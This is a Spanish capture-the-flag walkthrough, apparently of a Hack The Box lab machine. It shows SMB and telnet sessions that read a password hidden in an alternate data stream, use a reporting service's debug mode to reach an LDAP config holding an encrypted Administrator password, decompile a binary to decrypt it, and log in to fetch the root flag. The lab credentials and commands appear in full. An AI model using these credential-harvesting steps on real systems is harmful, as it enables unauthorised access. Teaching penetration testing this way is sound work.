Siguiendo con la búsqueda, observamos un fichero que parece interesante en la ruta \C.Smith\HQK Reporting, descargamos el mismo y comprobamos el contenido:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt" altname: DEBUGM~1.TXT create_time: vie ago 9 01:06:12 2019 CEST access_time: vie ago 9 01:06:12 2019 CEST write_time: vie ago 9 01:08:17 2019 CEST change_time: vie ago 9 01:08:17 2019 CEST attributes: A (20) stream: [::$DATA], 0 bytes stream: [:Password:$DATA], 15 bytes smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password" getting file \C.Smith\HQK Reporting\Debug Mode Password.txt:Password of size 15 as Debug Mode Password.txt:Password (0,0 KiloBytes/sec) (average 0,1 KiloBytes/sec) smb: \C.Smith\HQK Reporting\> # cat Debug\ Mode\ Password.txt:Password WBQ201953D8w |
Descargamos también otro fichero que parece interesante:
|
1 2 |
smb: \C.Smith\HQK Reporting\> get HQK_Config_Backup.xml getting file \C.Smith\HQK Reporting\HQK_Config_Backup.xml of size 249 as HQK_Config_Backup.xml (1,1 KiloBytes/sec) (average 0,2 KiloBytes/sec) |
Y observamos que indica que el puerto de conexión es el 4386, que vimos anteriormente en el escaneo con nmap
|
1 2 3 4 5 6 |
# cat HQK_Config_Backup.xml <?xml version="1.0"?> <ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>4386</Port> <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory> </ServiceSettings> |
Probamos el acceso por telnet a través de ese puerto y observamos que tenemos acceso a la herramienta HQK Reporting Service con versión 1.2 y que podemos utilizar para leer ficheros.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
# telnet 10.10.10.178 4386 Trying 10.10.10.178... Connected to 10.10.10.178. Escape character is '^]'. HQK Reporting Service V1.2 >help This service allows users to run queries against databases using the legacy HQK format --- AVAILABLE COMMANDS --- LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> > |
Conectamos con la contraseña obtenida en modo debug y tenemos acceso a los directorios y ficheros existentes:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
>debug WBQ201953D8w Debug mode enabled. Use the HELP command to view additional commands that are now available >help This service allows users to run queries against databases using the legacy HQK format --- AVAILABLE COMMANDS --- LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> SERVICE SESSION SHOWQUERY <Query_ID> >setdir .. Current directory set to HQK >list Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY [DIR] ALL QUERIES [DIR] LDAP [DIR] Logs [1] HqkSvc.exe [2] HqkSvc.InstallState [3] HQK_Config.xml Current Directory: HQK > |
Revisamos por los directorios y observamos una contraseña en el fichero ldap.conf dentro del directorio LDAP
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
>setdir LDAP Current directory set to LDAP >list Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY [1] HqkLdap.exe [2] Ldap.conf Current Directory: LDAP >showquery 2 Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4= > |
Para descifrar la misma vamos a descargarnos el fichero HqkLdap.exe con smbclient y vamos a utilizar dnspy para analizar el mismo.
|
1 2 3 4 5 6 7 8 9 10 |
smb: \> cd "C.Smith\HQK Reporting\AD Integration Module" smb: \C.Smith\HQK Reporting\AD Integration Module\> ls . D 0 Fri Aug 9 14:18:42 2019 .. D 0 Fri Aug 9 14:18:42 2019 HqkLdap.exe A 17408 Thu Aug 8 01:41:16 2019 10485247 blocks of size 4096. 6543366 blocks available smb: \C.Smith\HQK Reporting\AD Integration Module\> get HqkLdap.exe getting file \C.Smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (40,7 KiloBytes/sec) (average 40,7 KiloBytes/sec) smb: \C.Smith\HQK Reporting\AD Integration Module\> |
Editaremos el código de HqkLdap.exe para poder obtener los datos que necesitamos y conseguir la contraseña del usuario Administrator en plano
Obteniendo la flag de root
Ahora que ya hemos conseguido la pass en plano del usuario Administrator, sólo nos queda entrar con dicho usuario y encontrar la flag de root.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
# smbclient \\\\10.10.10.178\\c$ -U Administrator Enter WORKGROUP\Administrator's password: Try "help" to get a list of possible commands. smb: \> ls $Recycle.Bin DHS 0 Tue Jul 14 04:34:39 2009 Boot DHS 0 Sat Jan 25 22:15:35 2020 bootmgr AHSR 383786 Sat Nov 20 05:40:08 2010 BOOTSECT.BAK AHSR 8192 Tue Aug 6 07:16:26 2019 Config.Msi DHS 0 Sat Jan 25 22:49:12 2020 Documents and Settings DHS 0 Tue Jul 14 07:06:44 2009 pagefile.sys AHS 2146881536 Fri May 8 06:33:02 2020 PerfLogs D 0 Tue Jul 14 05:20:08 2009 Program Files DR 0 Thu Aug 8 01:40:50 2019 Program Files (x86) DR 0 Tue Jul 14 07:06:53 2009 ProgramData DH 0 Mon Aug 5 22:24:41 2019 Recovery DHS 0 Mon Aug 5 22:22:25 2019 restartsvc.bat A 33 Thu Aug 8 01:43:09 2019 Shares D 0 Tue Aug 6 15:59:55 2019 System Volume Information DHS 0 Tue Aug 6 06:17:38 2019 Users DR 0 Thu Aug 8 19:19:40 2019 Windows D 0 Sat Jan 25 22:22:42 2020 10485247 blocks of size 4096. 6543364 blocks available smb: \> cd Users\Administrator\Desktop\ smb: \Users\Administrator\Desktop\> ls . DR 0 Sun Jan 26 08:20:50 2020 .. DR 0 Sun Jan 26 08:20:50 2020 desktop.ini AHS 282 Sat Jan 25 23:02:44 2020 root.txt A 32 Tue Aug 6 00:27:26 2019 10485247 blocks of size 4096. 6543364 blocks available smb: \Users\Administrator\Desktop\> get root.txt getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec) smb: \Users\Administrator\Desktop\> |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
